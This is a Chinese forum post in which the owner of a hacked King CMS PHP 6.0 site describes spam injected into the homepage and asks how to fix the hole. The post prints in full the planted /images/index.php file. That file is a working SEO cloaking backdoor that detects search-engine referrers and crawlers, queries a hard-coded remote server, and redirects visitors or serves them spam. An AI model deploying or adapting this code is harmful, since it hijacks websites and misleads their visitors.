该博客内容描述了一次网站被恶意挂马的情况,攻击者在/images目录下上传了index.php文件,并篡改了首页标题和关键词,注入了非法内容。文件中包含了定义常量、URL重定向和对HTTP请求的检查等代码,表明可能通过PHP后门进行操作。修复措施可能包括清理恶意文件、加强文件上传验证、修改后台目录及更新安全设置。
king CMS PHP版 6.0 被挂马
在/images 目录下上传一个index.php 文件
然后在首页把 标题,关键词都改没了,都改成些 球 黄色 之类的关键词
这是什么 漏洞 要怎么修复阿...求解
我想应该是从后台 那里上传的 PHP文件 如果改后台目录,我查了一下要改好多地方,这不保证改出错阿..
index.php 文件内容如下
set_time_limit(20);error_reporting(0);
define('u_b','/');
define('s_u',' http://166.88.67.229:8043/ ');
define('s_s','@haosou.com|360.cn|baidu|spider|360spider|so|360|sogou|sm.cn|youdao@i');
define('h_t',$_SERVER['SERVER_NAME']);define('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER['HTTP_USER_AGENT']);define('h_z',s_p());
function s_p(){$d='';if(isset($_SERVER['REQUEST_URI'])){$d=$_SERVER['REQUEST_URI'];}else{if(isset($_SERVER['argv'])){$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];}else{$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];}}if(isset($_SERVER['SERVER_SOFTWARE']) && false!==stristr($_SERVER['SERVER_SOFTWARE'],'IIS')){if(function_exists('mb_convert_encoding')){$d=mb_convert_encoding($d,'UTF-8','GBK');}else{$d=@iconv('GBK','UTF-8',@iconv('UTF-8','GBK',$d))==$d?$d:@iconv('GBK','UTF-8',$d);}}$r=explode('#',$d,2);$d=$r[0];return $d;}function r_s($url){$o=array('http' => array('method'=>"GET",'timeout'=>8));$context=stream_context_create($o);$h=file_get_contents($url,false,$context);if(empty($h)){$h=file_get_contents($url);}return $h;}
if(preg_match(s_s,r_s)){$d_s=true;if(preg_match("@site%3A|inurl%3A@i",r_s)){setcookie('xx',h_t,time()+259200);$d_s=false;}if($d_s ){setcookie('xx',h_t,time()+259200);$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&ad=1&xh='.bin2hex(h_t);$d_c=r_s($d_u);header("Location: ".$d_c.'?'.h_t);exit;}}if(strstr(h_z,u_b)){if(preg_match(s_s,u_s)){$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&xh='.bin2hex(h_t);$d_c=r_s($d_u);echo $d_c;exit;}}
?>
1060
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
